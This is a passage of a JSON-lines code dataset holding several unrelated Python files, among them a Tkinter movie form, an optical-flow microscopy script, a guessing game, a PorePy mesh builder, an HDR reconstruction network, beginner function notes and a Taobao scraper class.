Gdesc[\"font\"] = ft\n Gdesc[\"fg\"] = \"#333333\"\n Gdesc[\"justify\"] = \"left\"\n Gdesc[\"text\"] = \"\"\n Gdesc.place(x=40,y=130,width=301,height=30)\n\n GLabel_464= Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_464[\"font\"] = ft\n GLabel_464[\"fg\"] = \"#999999\"\n GLabel_464[\"justify\"] = \"center\"\n GLabel_464[\"text\"] = \"Genero\"\n GLabel_464.place(x=35,y=165,width=70,height=25)\n\n Ggen= Entry(self, name=\"txtGenero\")\n Ggen[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Ggen[\"font\"] = ft\n Ggen[\"fg\"] = \"#333333\"\n Ggen[\"justify\"] = \"left\"\n Ggen[\"text\"] = \"\"\n Ggen.place(x=40,y=190,width=172,height=30)\n\n GLabel_14= Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_14[\"font\"] = ft\n GLabel_14[\"fg\"] = \"#999999\"\n GLabel_14[\"justify\"] = \"center\"\n GLabel_14[\"text\"] = \"Actores\"\n GLabel_14.place(x=35,y=220,width=70,height=20)\n\n Gact= Entry(self, name=\"txtActores\")\n Gact[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gact[\"font\"] = ft\n Gact[\"fg\"] = \"#333333\"\n Gact[\"justify\"] = \"left\"\n Gact[\"text\"] = \"\"\n Gact.place(x=40,y=240,width=232,height=30)\n\n GLabel_656= Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_656[\"font\"] = ft\n GLabel_656[\"fg\"] = \"#999999\"\n GLabel_656[\"justify\"] = \"center\"\n GLabel_656[\"text\"] = \"Duracion\"\n GLabel_656.place(x=35,y=275,width=70,height=25)\n\n Gdurac= Entry(self, name=\"txtDuracion\")\n Gdurac[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gdurac[\"font\"] = ft\n Gdurac[\"fg\"] = \"#333333\"\n Gdurac[\"justify\"] = \"left\"\n Gdurac[\"text\"] = \"\"\n Gdurac.place(x=40,y=300,width=139,height=30)\n\n GButton_924= Button(self)\n GButton_924[\"bg\"] = \"#e9e9ed\"\n ft = tkFont.Font(family='Times',size=10)\n GButton_924[\"font\"] = ft\n GButton_924[\"fg\"] = \"#000000\"\n GButton_924[\"justify\"] = \"center\"\n GButton_924[\"text\"] = \"Aceptar\"\n GButton_924.place(x=140,y=360,width=70,height=25)\n GButton_924[\"command\"] = self.aceptar\n\n GButton_220= Button(self)\n GButton_220[\"bg\"] = \"#e9e9ed\"\n ft = tkFont.Font(family='Times',size=10)\n GButton_220[\"font\"] = ft\n GButton_220[\"fg\"] = \"#000000\"\n GButton_220[\"justify\"] = \"center\"\n GButton_220[\"text\"] = \"Cancelar\"\n GButton_220.place(x=240,y=360,width=70,height=25)\n GButton_220[\"command\"] = self.cancelar\n\n #si peli_id se pasa como parametro \n if peli_id is not None:\n pelicula = peli.obtener_id(peli_id)\n \n if pelicula is None:\n tkMsgBox.showerror(self.master.title(), \"Se produjo un error al obtener los datos del usuario, reintente nuevamente\")\n self.destroy()\n else:\n Gtit.insert(0, pelicula[0])\n Gdesc.insert(0, pelicula[1])\n Ggen.insert(0, pelicula[2])\n Gact.insert(0, pelicula[3])\n Gdurac.insert(0, pelicula[4]) \n\n def get_value(self, name):\n return self.nametowidget(name).get()\n\n def get_index(self, name):\n return self.nametowidget(name).current() + 1\n\n def cancelar(self):\n self.destroy()\n\n def aceptar(self):\n try: \n titulo = self.get_value(\"txtTitulo\")\n descripcion = self.get_value(\"txtDescripcion\") \n genero = self.get_value(\"txtGenero\") \n actores = self.get_value(\"txtActores\")\n duracion = self.get_value(\"txtDuracion\") \n \n # TODO validar los datos antes de ingresar\n if titulo == \"\" or descripcion == \"\" or genero == \"\" or actores == \"\" or duracion == \"\":\n tkMsgBox.showerror(self.master.title(), \"todos los campos deben estar completos.\")\n return\n\n if self.peli_id is None:\n print(\"Alta de pelicula\")\n if not peli.existe(titulo):\n peli.agregar(titulo, descripcion, genero, actores, duracion)\n tkMsgBox.showinfo(self.master.title(), \"Registro agregado!!!!!!\") \n try:\n self.master.refrescar()\n except Exception as ex:\n print(ex)\n self.destroy() \n else:\n tkMsgBox.showwarning(self.master.title(), \"Pelicula existente en nuestros registros\")\n else:\n print(\"Actualizacion de pelicula\")\n peli.actualizar(self.peli_id, titulo, descripcion, genero, actores, duracion)\n tkMsgBox.showinfo(self.master.title(), \"Registro modificado!!!!!!\") \n self.master.refrescar()\n self.destroy() \n\n except Exception as ex:\n tkMsgBox.showerror(self.master.title(), str(ex))","repo_name":"ramondom/proyecto-f","sub_path":"frmpeli.py","file_name":"frmpeli.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5880680985","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# coding = UTF-8\n#Derive from \"tcp_echo_server_0101bOK\"\n\n\"\"\"\nA simple \"tcp echo server\" for demonstrating TCP usage.\nThe server listens for TCP packets and echoes any received\npackets back to the originating host.\n\n\"\"\"\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\nimport numpy as np\n\nclass DI:\n def __init__(self, Lines = [1850826, 1846028, 1858695, 1846032, 1851374, 1844861, 1854828, 1855687], Path = \"./Data.csv\"):\n self.Lines = Lines\n self.Path = Path\n self.X = 0\n self.Fig = plt.figure()\n self.Ax = self.Fig.add_subplot(1,1,1)\n\n def Animate(self):\n xs1 = []\n ys1 = []\n for line in self.Lines:\n self.X += 1\n y = line\n xs1.append(int(self.X))\n ys1.append(int(y))\n self.xs1 = xs1\n self.ys1 = ys1\n self.Ax.clear()\n self.Ax.plot(xs1,ys1,linewidth=1)\n\n def Show(self):\n ani = animation.FuncAnimation(self.Fig, self.Animate(),interval=1)\n plt.show()\n\nDI = DI()\nDI.Show()\n","repo_name":"GemYamTechnology/CoherentBR","sub_path":"Python/C_2d_plot0.py","file_name":"C_2d_plot0.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41531024965","text":"import os, os.path\nimport argparse\nfrom datetime import datetime\nimport numpy as np\nimport cv2 as cv\nfrom scipy.ndimage import gaussian_filter, gaussian_filter1d\nimport read_lif as lif\nimport check\nimport json\nimport h5py\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Perform 2D optical flow between planes of successive stacks of a LIF serie')\n parser.add_argument('filename', type= str, help = 'path and name of the LIF file')\n parser.add_argument('-s','--series', type=int, help='The first series to analyse. (the only one if endseries is None.)')\n parser.add_argument('--endseries', type=int, help='The last series to analyse (if a time aquitision was split in more than one series).')\n parser.add_argument('-o','--output',default='flow', type=str, help = 'output path and prefix')\n parser.add_argument('--preblur',type=float, default=1., help='Amount of gaussian preblur in XY')\n parser.add_argument('--Zpreblur',type=float, default=0., help='Amount of gaussian preblur in Z')\n parser.add_argument('--pyrsteps',type=int, default=4, help='Number of steps in the pyramid used by Farneback optical flow algorithm')\n parser.add_argument('--square_farneback',type=bool, default=False, help='Optical flow algorithm uses square filtering instead of isotropic Gaussian. Causes anisotropy problem but is marginally faster.')\n parser.add_argument('--binning',type=int, default=8, help='Binning of the output flow field in X and Y. Chose a power of 2.')\n parser.add_argument('--no_clean_git',type=bool, default=False, help='Bypass checking wether my git repository is clean (Use only for tests).')\n\n args = parser.parse_args()\n\n args.filename = os.path.abspath(args.filename)\n if not args.no_clean_git:\n args.commit = check.clean_git(__file__).hexsha\n args.datetime = datetime.now().isoformat()\n rea = lif.Reader(args.filename, False)\n if not hasattr(args, 'series') or args.series is None:\n args.series = rea.chooseSerieIndex()\n if not hasattr(args, 'endseries') or args.endseries is None:\n args.endseries = args.series\n\n sers = rea.getSeries()[args.series:args.endseries+1]\n nbFrames = sum(ser.getNbFrames() for ser in sers)\n ser = sers[0]\n\n flags = 0\n if not args.square_farneback:\n flags &= cv.OPTFLOW_FARNEBACK_GAUSSIAN\n\n #prepare output\n with h5py.File(args.output+\".h5\", \"a\") as h5file:\n #prepare the output array on disk\n flow = h5file.require_dataset(\n \"FlowField3D\",\n (nbFrames-1, ser.getFrameShape()[0], ser.getFrameShape()[1]//args.binning, ser.getFrameShape()[2]//args.binning, 3),\n dtype='float32')\n #prepare timestamps array on disk\n timestamps = h5file.require_dataset(\n \"timestamps\",\n (nbFrames, ser.getFrameShape()[0]),\n dtype=float\n )\n #save all analysis parameters\n for k,v in args.__dict__.items():\n flow.attrs[k] = v\n #make a list with the binning value to be multiplied with the opticalflow value to obtain obsolute values in pixel\n bins = h5file.require_dataset(\n \"binning_size_in_pixels\",\n data= np.array([args.binning, args.binning,1]),\n shape=(3,), dtype=np.int32)\n binning_shape = (flow.shape[1], flow.shape[2], args.binning, flow.shape[3], args.binning)\n #allocate memory\n flowxy = np.zeros(ser.getFrameShape()+[2])\n flowxz = np.zeros_like(flowxy)\n flowyz = np.zeros_like(flowxy)\n weights = np.zeros(ser.getFrameShape()+[3])\n #perform actual computation\n ti = 0\n for ser in sers:\n print(\"\\n%s\"%(ser.getName()))\n #save timestamps\n ts = ser.getTimeStamps()\n nts = len(ts)//ser.getFrameShape()[0]\n timestamps[ti:ti+nts] = ts[:nts*ser.getFrameShape()[0]].reshape((nts, ser.getFrameShape()[0]))\n for t, fr in ser.enumByFrame():\n #blur only in XY since PSF is already elongated in Z.\n f1 = gaussian_filter(fr.astype(float), [args.Zpreblur,args.preblur,args.preblur])\n #normalize by intensity profile along z. Absolutely crucial, otherwise Farneback algorithm discards low intensity pixels\n intensity_profile = f1.max((1,2))\n intensity_profile[intensity_profile==0] = 1\n f1 = (f1*(255/intensity_profile)[:,None,None]).astype(np.uint8)\n if t+ti > 0:\n weights[:] = np.finfo(weights.dtype).eps\n #unfortunately, cv.alcOpticalFlowFarneback does not work directly in 3D\n #Optical flow in each XY plane give dX and dY, but no information on dZ\n for i, (im0, im1) in enumerate(zip(f0, f1)):\n flowxy[i] = cv.calcOpticalFlowFarneback(\n im0, im1,\n None, 0.5, args.pyrsteps, 15, 3, 5, 1.2, flags=flags\n )\n #estimate the confidence of each pixel using a Shi-Tomasi criterion\n weights[i,...,0] = cv.cornerMinEigenVal(im0,3)\n #unshear f1 along X only (here we suppose dY small)\n zprofile = (flowxy*weights[...,0,None]).sum((1,2)) / weights[...,0,None].sum((1,2))\n izprofile = zprofile.astype(int)\n maxshift = izprofile.max(0)\n minshift = izprofile.min(0)\n ptpshift = maxshift - minshift\n shifted = np.zeros((f1.shape[0], f1.shape[1], f1.shape[2]-ptpshift[0]), np.uint8)\n for z, im in enumerate(f1):\n shift = izprofile[z,0]-minshift[0]\n shifted[z] = im[...,shift:shifted.shape[-1]+shift]\n #shifted[z] = np.pad(im, pad_width=((0,0), (ptpshift[0]-shift[0],shift[0])), mode='constant')\n #Optical flow in each XZ where a correspondance is possible between the two times.\n mshift = max(0, minshift[0])\n sl = slice(mshift, shifted.shape[2]+mshift)\n for i in range(f0.shape[1]):\n fl = cv.calcOpticalFlowFarneback(\n f0[:,i, sl],\n shifted[:,i,:],\n None, 0.5, args.pyrsteps, 15, 3, 5, 1.2, flags=flags\n )\n #Outside of the conrresponding range, results correspond to XY results\n flowxz[:,i,:] = fl.mean(axis=(0,1))\n #inside the range, use the calculated values\n flowxz[:,i,sl] = fl\n #estimate the confidence of each pixel using a Shi-Tomasi criterion\n weights[:,i,sl,1] = cv.cornerMinEigenVal(f0[:,i,sl],3)\n #Slicing perpendicular to Y creates independent values and thus noise along Y. Blur along that direction\n gaussian_filter1d(flowxz, 4, axis=1, output=flowxz)\n #add back the integer part of the X displacement\n flowxz[...,0] += np.trunc(zprofile[:,None,None,0])\n\n #Optical flow in each YZ where a correspondance is possible between the two times.\n for i in range(shifted.shape[2]):\n fl = cv.calcOpticalFlowFarneback(\n f0[:,:,i+mshift],\n shifted[:,:,i],\n None, 0.5, args.pyrsteps, 15, 3, 5, 1.2, flags=flags\n )\n flowyz[...,i+mshift,:] = fl\n #estimate the confidence of each pixel using a Shi-Tomasi criterion\n weights[...,i+mshift,2] = cv.cornerMinEigenVal(f0[:,:,i+mshift],3)\n #pad YZ results along X to correspond to the shape of XY results shape\n mflowyz = flowyz[:,:,sl].mean(2)[:,:,None]\n flowyz[:,:,:mshift] = mflowyz\n flowyz[:,:,shifted.shape[2]+mshift:] = mflowyz\n #Slicing perpendicular to X creates independent values and thus noise along X. Blur along that direction\n gaussian_filter1d(flowyz, 4, axis=2, output=flowxz)\n #add a small constant weight to prevent division by zero\n #weights += 1e-7\n #weighted binning in XY and saving. Here we suppose opicalflow in XY is the ground truth\n flow[t+ti-1,...,:2] = (flowxy*weights[...,0,None]).reshape(binning_shape+(2,)).sum(axis=(2,4)) / weights[...,0].reshape(binning_shape).sum(axis=(2,4))[...,None]\n #take the average of the two measurements of dZ, weighted by confidence\n flow[t+ti-1,...,2] = ((flowxz[...,1]*weights[...,1] + flowyz[...,1]*weights[...,2])).reshape(binning_shape).sum(axis=(2,4)) / ((weights[...,1]+weights[...,2])).reshape(binning_shape).sum(axis=(2,4))\n f0 = np.copy(f1)\n print('\\r%d (%.01f %%)'%(t, 100*(t+ti+1)/flow.shape[0]), sep=' ', end=' ', flush=True)\n ti += ser.getNbFrames()\n print(\"\\ndone!\")\n","repo_name":"KehoAll/StageM2","sub_path":"gelrupture/opticalflow.py","file_name":"opticalflow.py","file_ext":"py","file_size_in_byte":9293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2425236038","text":"import random\nimport time\n\nclass Game():\n def __init__(self):\n self.start = 1\n self.end = 10\n self.guess_limit = 5\n self.guess_ct = 0\n self.won = False\n self.target = None\n self.total_games = 0\n self.win_count = 0\n self.best_win = float('inf')\n self.feature_map = {\n 'G': self.modify_guess_limit,\n 'R': self.modify_range,\n 'D': self.reset,\n 'C': self.play_game\n }\n self.main_screen()\n\n def main_screen(self):\n change_request = None\n while change_request != 'C':\n print()\n change_request = input(\"Please press the key representing any of the following settings that you would like to change: Guess limit (G), Guess range (R), Reset all features to defaults (D), or Continue (C): \")\n self.feature_map[change_request]()\n\n def reset(self):\n self.start = 1\n self.end = 10\n self.guess_limit = 5\n self.win_count = 0\n self.best_win = float('inf')\n \n def modify_range(self):\n # provide user with more info and opportunity to back out\n print()\n print(\"This feature allows you to modify the range of values that the secret number can be between.\")\n validate = input(\"Please press 'D' if you would like to reset the range to its default or 'E' if you would like to exit and keep the current setting as is; otherwise, please press any other key to continue: \")\n if validate == 'D':\n self.start = 1\n self.end = 10\n return\n elif validate == 'E':\n return\n # prompt the user to specify a number range\n self.start = int(input(\"Please enter the start of the range. (For example, if you wanted the range of valid numbers to be between 10 and 30, you would enter '10'): \"))\n self.end = int(input(\"Please enter the end of the range. (For example, if you wanted the range of valid numbers to be between 10 and 30, you would enter '30'): \"))\n\n def generate_target(self):\n with open(\"num-service.txt\", \"w\") as file:\n file.write(f\"{self.start},{self.end}\")\n num_generated = False\n while True:\n time.sleep(1.0)\n with open(\"num-service.txt\", \"r\") as f:\n line = f.readline().strip()\n if not line:\n continue\n if line.isnumeric():\n num_generated = True\n self.target = int(line)\n break\n\n def modify_guess_limit(self):\n print()\n print(\"This feature allows you to modify the number of attempts you have to guess the secret number.\")\n validate = input(\"Please press 'D' if you would like to reset the guess limit to its default or 'E' if you would like to exit and keep the current setting as is; otherwise, please press any other key to continue: \")\n if validate == 'D':\n self.guess_limit = 5\n return\n elif validate == 'E':\n return\n # prompt the user to specify guess limit\n print(\"\")\n self.guess_limit = int(input(\"Great! What is the maximum number of guesses you’d like to specify? Please enter a numerical value. (For example, if you wanted to have up to 5 guesses before the game ends, you would enter '5'): \"))\n\n def end_game(self):\n self.total_games += 1\n # if game won, print won\n if self.won:\n self.win_count += 1\n self.best_win = min(self.best_win, self.guess_ct)\n print()\n print(f\"Congrats! You won the game in {self.guess_ct} guesses!\")\n print(f\"You've won a total of {self.win_count} out of {self.total_games} games, with the quickest win being in {self.best_win} guesses.\")\n # if game not won after reaching guess limit, print loss\n else:\n print()\n print(f\"Sorry, you've ran out of guesses.\")\n print(f\"You've won a total of {self.win_count} out of {self.total_games} games, with the quickest win being in {self.best_win} guesses.\")\n # prompt user to play another game\n open('num-service.txt', 'w').close()\n play_again = input(\"Would you like to play again? (Y/N): \")\n if play_again == 'Y':\n self.won = False\n self.guess_ct = 0\n self.play_game()\n\n def play_game(self):\n print()\n # validate user is ready to play game\n confirmation = input(\"Are you ready to start the game? (Y/N): \")\n if confirmation == 'N':\n self.main_screen()\n return\n self.generate_target()\n # generate a random number between number range\n while self.guess_ct < self.guess_limit and not self.won:\n # prompt user for guess and based on guess, provide\n guess = int(input(\"Guess the number: \"))\n self.guess_ct += 1\n if guess == self.target:\n print(\"Correct! You guessed the number.\")\n self.won = True\n break\n elif guess < self.target:\n # update guess ct and provide feedback\n print(f\"Too low! Try again. You have {self.guess_limit - self.guess_ct} guesses remaining.\")\n elif guess > self.target:\n print(f\"Too high! Try again. You have {self.guess_limit - self.guess_ct} guesses remaining.\")\n self.end_game()\n\ndef main():\n game = Game()\n\nif __name__ == \"__main__\":\n main()","repo_name":"mjung1/361_Project","sub_path":"higher_lower.py","file_name":"higher_lower.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32331827518","text":"import numpy as np\nimport porepy as pp\n\n\ndef create_gb(mesh_args: dict, dim: int = 2, fractured: bool = False):\n \"\"\"\n Create the grid for the computations:\n - An unstructured 2D grid, without fractures, or with five fractures\n - A 3D grid, either without fractures or with two that intersect at a line\n\n Parameters:\n mesh_args (dict): contains mesh arguments for the (unstrucured) grid\n dim: int: highest dimension of grid\n fractured (boolean, optional): Whether fractures are present.\n Default is False\n\n \"\"\"\n\n if not mesh_args:\n raise ValueError(\"Mesh parameters must be given\")\n\n if dim == 2:\n\n if fractured:\n pts = np.array(\n [\n [0.6, 0.2], # End pts\n [0.2, 0.8], # Statring pts\n [0.6, 0.6],\n [0.2, 0.5],\n [1.2, 0.6],\n [0.9, 0.8],\n [1.7, 0.3],\n [1.0, 0.2],\n ]\n ).T\n\n e = np.array([[0, 1], [2, 3], [4, 5], [6, 7]]).T\n\n else:\n pts, e = None, None\n # end if-else\n\n domain = {\"xmin\": 0.0, \"xmax\": 2, \"ymin\": 0.0, \"ymax\": 1}\n\n network_2d = pp.FractureNetwork2d(pts, e, domain)\n gb = network_2d.mesh(mesh_args)\n # end if-else\n\n elif dim == 3:\n\n domain = {\"xmin\": 0, \"xmax\": 1, \"ymin\": 0, \"ymax\": 1, \"zmin\": 0, \"zmax\": 1}\n\n if fractured:\n f1 = pp.Fracture(\n np.array(\n [\n [0.25, 0.75, 0.25, 0.75],\n [0.30, 0.30, 0.70, 0.70],\n [0.30, 0.30, 0.70, 0.70],\n ]\n )\n )\n f2 = pp.Fracture(\n np.array(\n [\n [0.25, 0.75, 0.25, 0.75],\n [0.30, 0.30, 0.70, 0.70],\n [0.70, 0.70, 0.30, 0.30],\n ]\n )\n )\n frac_list = [f1, f2]\n else:\n frac_list = []\n # end if-else\n network_3d = pp.FractureNetwork3d(frac_list, domain=domain)\n gb = network_3d.mesh(mesh_args)\n else:\n raise ValueError(\"Only 2- or 3D grids\")\n # end if-else\n\n return gb\n","repo_name":"taj004/Fully_coupled_THC","sub_path":"code/create_mesh.py","file_name":"create_mesh.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"8932034066","text":"import os\nimport numpy as np\nimport torch.nn.functional as F\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n#from s2cnn import SO3Convolution\n#from s2cnn import S2Convolution\n#from s2cnn import so3_integrate\n#from s2cnn import so3_near_identity_grid\n#from s2cnn import s2_near_identity_grid\nimport numpy as np\nfrom utils import *\nfrom dequntization_net import Dequantization_net\nfrom linearization_net import Linearization_net\nfrom hallucination_net import Hallucination_net\nimport matplotlib.pyplot as plt\n\n\n\nclass Net(nn.Module):\n def __init__(self, args):\n super(Net, self).__init__()\n self.HDR_net = HDR_net(args)\n \n self.args = args\n \n# self.register_buffer(\"integral\", torch.zeros((args.batch_size,), requires_grad=False))\n# self.register_buffer(\"dphi\", torch.tensor([2*np.pi/args.width], requires_grad=False))\n# self.register_buffer(\"dtheta\", torch.tensor([np.pi/args.height], requires_grad=False))\n self.dphi = 2 * np.pi/args.width\n self.dtheta = np.pi/args.height\n \n phi = torch.zeros((self.args.height//2, self.args.width))\n theta = torch.zeros((self.args.height//2, self.args.width))\n \n for y in range(self.args.height//2):\n for x in range(self.args.width):\n phi[y,x] = (x / args.width) * 2 * np.pi\n theta[y,x] = (y / args.height) * np.pi\n self.register_buffer(\"phi\", phi.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n self.register_buffer(\"theta\", theta.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n \n def forward(self, ldr, exposure):\n _,_,hdr = self.HDR_net(ldr, exposure)\n img = 179 * (hdr[:,0,:,:] * 0.2126 + hdr[:,1,:,:] * 0.7152 + hdr[:,2,:,:] * 0.0722)\n# self.integral = torch.zeros((self.args.batch_size,), requires_grad=False).cuda()\n \n output = img[:,0:self.args.height//2,:].mul(torch.sin(self.theta)).mul(torch.cos(self.theta)) * self.dphi * self.dtheta\n# for y in range(self.args.height//2):\n# for x in range(self.args.width):\n# phi = (x / self.args.width) * 2 * np.pi\n# theta = (y / self.args.height) * np.pi\n# self.integral += img[:,y,x] * np.sin(theta) * np.cos(theta) * self.dphi * self.dtheta\n return hdr, output.sum([1,2]) / 1000.0\n\n\nclass Integral(nn.Module):\n def __init__(self, args):\n super(Integral, self).__init__()\n self.args = args\n\n self.dphi = 2 * np.pi/args.width\n self.dtheta = np.pi/args.height\n \n phi = torch.zeros((self.args.height//2, self.args.width))\n theta = torch.zeros((self.args.height//2, self.args.width))\n \n for y in range(self.args.height//2):\n for x in range(self.args.width):\n phi[y,x] = (x / args.width) * 2 * np.pi\n theta[y,x] = (y / args.height) * np.pi\n self.register_buffer(\"phi\", phi.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n self.register_buffer(\"theta\", theta.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n \n def forward(self, hdr):\n img = 179 * (hdr[:,0,:,:] * 0.2126 + hdr[:,1,:,:] * 0.7152 + hdr[:,2,:,:] * 0.0722)\n output = img[:,0:self.args.height//2,:].mul(torch.sin(self.theta)).mul(torch.cos(self.theta)) * self.dphi * self.dtheta\n return output.sum([1,2]) / 1000.0\n\n\n\nclass HDR_net(nn.Module):\n def __init__(self, args):\n super(HDR_net, self).__init__()\n\n self.dequantization = Dequantization_net()\n self.linearization = Linearization_net()\n self.halluicnation = Hallucination_net(args)\n\n def sample_1d(self, img, y_idx):\n b, h, c = img.shape\n b, n = y_idx.shape\n \n b_idx = torch.arange(b).float().cuda()\n b_idx = b_idx.unsqueeze(-1)\n b_idx = b_idx.repeat(1, n)\n \n y_idx = torch.clamp(y_idx, 0, h-1)\n a_idx = torch.stack([b_idx, y_idx], axis=-1).long()\n batch_out = []\n for i in range(b):\n out = img[list(a_idx[i].T)]\n batch_out.append(out)\n output = torch.cat(batch_out, axis=0)\n return output.reshape(b,n,c)\n\n\n def interp_1d(self, img, y):\n b, h, c = img.shape\n b, n = y.shape\n\n y_0 = torch.floor(y)\n y_1 = y_0 + 1\n\n y_0_val = self.sample_1d(img, y_0)\n y_1_val = self.sample_1d(img, y_1)\n\n w_0 = (y_1 - y).unsqueeze(-1)\n w_1 = (y - y_0).unsqueeze(-1)\n return w_0 * y_0_val + w_1 * y_1_val\n\n def apply_rf(self, x, rf):\n input_shape = x.shape\n b, k = rf.shape\n x = self.interp_1d(rf.unsqueeze(-1), (k-1)*x.reshape(b,-1))\n return x.reshape(input_shape)\n \n def forward(self, input, exposure):\n C_pred = self.dequantization(input)\n C_pred = torch.clamp(C_pred, 0, 1)\n # C_pred: output of dequantiation\n\n pred_invcrf = self.linearization(C_pred, exposure)\n B_pred = self.apply_rf(C_pred, pred_invcrf)\n\n thr = 0.12\n alpha, _ = torch.max(B_pred, 1)\n alpha = torch.clamp(torch.clamp(alpha-1.0+thr, max=0.0) / thr, min=1.0)\n alpha = alpha.unsqueeze(1).repeat(1,3,1,1)\n y_predict, vgg_conv_layers = self.halluicnation(B_pred, exposure)\n y_predict = F.relu(y_predict)\n A_pred = B_pred + alpha * y_predict\n\n return C_pred, B_pred, A_pred\n\n\n\n","repo_name":"wwzjer/HDR","sub_path":"network_integrate.py","file_name":"network_integrate.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23478424272","text":"#this is the function\ndef HelloWord():\n print(\"Hello World\")\n\n#now you have to call it\nHelloWord()\n\ndef Greeting(name):\n print(\"Hi \" + name + \"!\")\n\nGreeting(\"Hope\")\n\ndef Add(num1, num2):\n print(num1 + num2)\n\nAdd(1, 4)\n\n#return statement\n#python will stop running once return is called!\ndef ReturnAdd(num1, num2):\n return (num1 + num2)\n\nsum = ReturnAdd(12, 34)\n\nprint(sum)\n\n#in-built functions\n\n#abs\n#call it on any positive or negative number\n#will get the absolute value of that number\nabs(34)\n\n#bool\n#bool of zero is false\n#bool of any other number is true\n#bool of none is false\nbool(0)\n\n#dir\n#gives you a list of anything you can do with a specific data type\n#will show you built-in functions of that data type\ndir(\"hello\")\n\n#help\n#takes in a function name\n#will show you what that function does\nex = \"hello\"\nhelp(ex.upper)\nhelp(ex.splitlines)\n\n#eval\n#run python code in a string format\nex2 = 'print(\"hi\")'\neval(ex2)\n\n#exec\n#similar to eval\n#for more complicated code\nexec(ex2)\n\n#converting data types\na = 1\nstr(a)\n#\"a\"\nfloat(a)\n#1.0\nint(a)\n#1\n\n","repo_name":"hopegiometti/LearningPython","sub_path":"syntax/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73769676093","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 27 Aug, 2014\n\n@author: wangyi\n'''\n\nfrom datetime import *\nfrom copy import *\n\nimport re\n\nclass Shop(object):\n '''\n classdocs\n '''\n param = {\n# 'id' : None,\n 'title' : None, \n# 'tmv' : None,\n# 'price' : None,\n# 'merchanturl' : None,\n 'httpurl_shop' : None,\n 'httpurl_commodity' : None,\n# 'rank' : 'NULL',\n 'noOfBuiers' : 'NULL',\n 'noOfComments' : 'NULL'\n }\n \n htmlmapping = {\n 'shop':\"div.col.item.st-item\", \n 'entry':\"div.tb-content\", \n }\n \n items = 100\n \n sqlcreate = \"\"\"\nCREATE TABLE `TBMerchantCredit`.`%s` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `httpurl_shop` VARCHAR(45) NOT NULL,\n `httpurl_commodity` VARCHAR(45) NOT NULL, \n `title` VARCHAR(45) NOT NULL,\n `tags` VARCHAR(45) NOT NULL,\n `rank_tags` INT NULL,\n `price` INT NULL, \n `tmv` DATE NOT NULL,\n `noOfBuiers` INT NULL,\n `noOfComments` INT NULL,\n PRIMARY KEY (`id`),\n UNIQUE INDEX `rank_tags_UNIQUE` (`rank_tags` ASC)); \n\"\"\"\n sqlinsert = \"\"\"\nINSERT INTO %s (`id`, `httpurl_shop`, `httpurl_commodity`, `title`, `tags`, `price`, `rank_tags`, `noOfBuiers`, `noOfComments`, `tmv`) VALUES (NULL, %(httpurl_shop)s, %(httpurl_commodity)s, %(title)s, %(tags)s, %(price)s, %(rank_tags)s, %(noOfBuiers)s, %(noOfComments)s, now()) \n\"\"\"\n#data = [('www.yiak.co', 'shiyishi', 'shoubiao', 1,2,3), ('www.yiak.co2', 'shiyishi2', 'shoubiao', 4,5,6)]\n def __init__(self):\n '''\n Constructor\n '''\n pass\n \n def extractEntry(self, dom):\n try:\n ShopsEntries = dom.find(\"div#mainsrp-itemlist\")\n \n # 9-2015,formatter\n #dom(\"div#mainsrp-spucombo\")\n # 9-2014, formatter\n #dom(\"div.tb-content\").children(\"div.col.item.st-item\")\n except Exception as e:\n raise(e)\n \n return ShopsEntries\n \n def extractShopUrl(self, shopAnchor):\n try:\n self.param['httpurl_shop'] = shopAnchor(\"div.col.seller\").children(\"a\").attr(\"href\")#div.col.seller.feature-dsi-tgr.popup-tgr\n except Exception as e:\n raise(e)\n \n def extractCommUrl(self, shopAnchor):\n try: \n self.param['httpurl_commodity'] = shopAnchor(\"h3.summary\").children(\"a\").attr(\"href\") \n except AttributeError as e:\n raise(e) \n \n def extractTitle(self, shopAnchor):\n try: \n self.param['title'] = shopAnchor(\"h3.summary\").children(\"a\").attr(\"title\") \n except AttributeError as e:\n raise(e)\n \n def extractNumofBuyers(self, shopAnchor):\n try:\n pattern = re.compile(\"\\d+\")\n noOfBuierstxt = shopAnchor(\"div.col.end.dealing\").text()#.encode('unicode-escape')\n self.param['noOfBuiers'] = int(re.search(pattern, noOfBuierstxt).group())\n except AttributeError as e:\n raise(e)\n \n def extractPrice(self, shopAnchor):\n try:\n pattern = re.compile(\"\\d+\\.\\d+\")\n pricetxt = shopAnchor(\"div.col.price.g_price.g_price-highlight\").text()#.encode('unicode-escape')\n self.param['price'] = float(re.search(pattern, pricetxt).group()) \n except AttributeError as e:\n 